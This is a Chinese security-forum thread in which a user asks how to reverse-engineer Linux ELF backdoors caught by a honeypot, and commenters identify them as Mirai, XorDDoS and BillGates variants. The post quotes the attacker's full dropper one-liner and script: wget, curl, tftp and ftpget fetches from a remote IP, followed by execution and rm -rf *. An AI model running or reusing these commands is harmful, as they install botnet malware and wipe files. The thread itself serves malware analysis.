爆破 后门连接 求分析
部署的蜜罐收获了一些linux elf后门,请问该怎么逆向分析呢
webhook 2018-06-22 10:12:53 2032人浏览

部署的蜜罐收获了一些linux elf后门,请问该怎么逆向分析呢

# file pud
pud: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped


====11.55更新====

hacker ip:173.249.54.210

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://167.99.39.63/8UsA.sh; curl -O http://167.99.39.63/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 167.99.39.63 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 167.99.39.63; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 167.99.39.63 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *


cat 8UsA.sh

#!/bin/bash

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://167.99.39.63/bins/yasaku.x86; curl -O http://167.99.39.63/bins/yasaku.x86;cat yasaku.x86 >tmp;chmod +x *;./tmp roots.ssh

评论 10
熊猫正正 2018-06-28 14:52:00 回复
一个Mirai变种,一个XorDDoS,两个BillGates
碧云涛 2018-06-28 17:42:24 回复
回复@熊猫正正: 牛逼
Myhost 2018-06-26 17:03:22 回复
牛逼了
taibai 2018-06-22 10:53:58 回复
静态分析,直接拖到ida里面然后按f5,因为没有剪切掉符号表,比较容易分析,也可以在虚拟机里面运行木马,进行动态分析
webhook 2018-06-22 11:01:03 回复
回复@taibai: 感谢大佬,freebuf的分析很详细。我去实战下,希望可以找到C&C服务器地址,反向d一波。
taibai 2018-06-22 13:32:53 回复
回复@webhook: 你要找cc服务器地址简单的很,直接运行该木马,然后查看木马进程的网络连接就可以了
webhook 2018-06-22 16:27:33 回复
回复@taibai: 哈哈,我也想过,但是我用的那个docker没有netstat,逆向比较有成就感吧~
CC服务器配置会很高吗,和发包机的配置相比会不会差一点呢
taibai 2018-06-22 10:51:25 回复
linux-syn19001ss和pub是同一种木马
taibai 2018-06-22 10:48:33 回复
a21jj文件是一个xorddos木马,分析可以参考http://www.freebuf.com/articles/system/119374.html
taibai 2018-06-22 10:45:29 回复
pub文件是一个gates比尔盖茨木马,分析可以参考http://www.freebuf.com/articles/system/117823.html